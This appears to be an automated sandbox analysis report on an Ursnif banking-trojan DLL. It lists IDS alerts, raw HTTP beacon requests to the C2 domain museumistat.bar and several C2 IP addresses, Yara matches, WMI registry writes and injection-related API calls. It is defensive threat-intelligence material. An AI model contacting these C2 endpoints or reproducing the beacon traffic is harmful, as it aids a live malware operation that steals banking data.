            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49756 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49756 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 62.173.145.37:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 62.173.145.37:80
            Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.3:49764 -> 62.173.149.135:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 62.173.149.135:80
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Wed, 19 Jan 2022 10:50:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Wed, 19 Jan 2022 10:50:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
            Source: unknownUDP traffic detected without corresponding DNS query: 208.67.222.222
            Source: unknownUDP traffic detected without corresponding DNS query: 208.67.222.222
            Source: unknownUDP traffic detected without corresponding DNS query: 208.67.222.222
Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: regsvr32.exe, 00000004.00000003.346708342.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.353643418.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.346671708.0000000002F63000.00000004.00000001.sdmp | String found in binary or memory: http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8
Source: regsvr32.exe, 00000004.00000003.333637218.0000000002F52000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.333810799.0000000002F62000.00000004.00000001.sdmp | String found in binary or memory: http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7Hyzb
Source: unknown | DNS traffic detected: queries for: museumistat.bar
Source: global traffic | HTTP traffic detected: GET /drew/wEnwCvgRr/tkjGrRWK504Gps4HB3Fh/a_2BgTA9pNLu5RTmMnf/cmF_2FoZExPeCfaavPGpw5/C4a_2B98FiRPO/vd2Nyn5c/h1bh48eCW9576sdvhYLet1i/wAsWnHJnYc/cKnuGYGL3HaarUE97/qNDbxnUrqa6o/sHAvWKK0ZF_/2FEfhnIyqYNHjo/0w_2F7ABHTCX38bGaal1i/N2IxD5P36ZAbXvHE/ihtoW7NXLZjCM45/tPYjxR5L6h/zPvdL.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/1_2Ff_2F9oFy50B/NUoWO_2FDz5xIg76q9/VveqFFcWO/HyFzcq3OFY_2BhIPCNw9/sIpk4tVFJ9VOtR2TNQU/et11cPI71f_2FqTVA64vkQ/ypIbEDHfIxxsr/MyPGmlo5/aegiD19qzpHWbW06aGHN_2F/zeC5Le5Fpu/swEVOnWdXMP11BFlG/5EITeJo9mr75/6dBXeBOslAr/PXd6axM5Td1aIF/iXDTVhWGdUnCVcgEXpRpk/4zChmYsnqrQ_2F/X48.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/ml7QN9H69bQc_2FqcErn/JWHN_2F1D_2FeQ7F2rf/oeEjPxzB_2Fw_2F8MEJzC6/5gAnzEpRNXWFk/64j4iITJ/jnOThCTb9WelDC2Av_2F9i8/VHepa0UCDh/KFl9Z1ZbYspbJ4E8_/2BzgcxaTppah/d9hJDFKgAt8/5U8WBthgJgfyxM/8RFDoFNHkI_2FZphi7QxP/YaWR2kATqPAKO_2B/PJwm2MPaqbbSQg_/2BLvMKsgjJPPYLJl45/I0CzZhv6_2FCZxS/FG1.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: museumistat.bar | Connection: Keep-Alive

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR

            E-Banking Fraud:

Yara detected Ursnif (same memory dump and process memory sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above)
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_017D4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02D44872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04AA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00AC4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

            System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: status.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 00000006.00000002.476168753.000000000069B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: 00000021.00000002.386067444.00000121EDC9B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: 00000005.00000003.463693625.000000000308F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B05BD0 CreateProcessAsUserW,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D462B GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D2A0A NtMapViewOfSection,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D8401 NtQueryVirtualMemory,
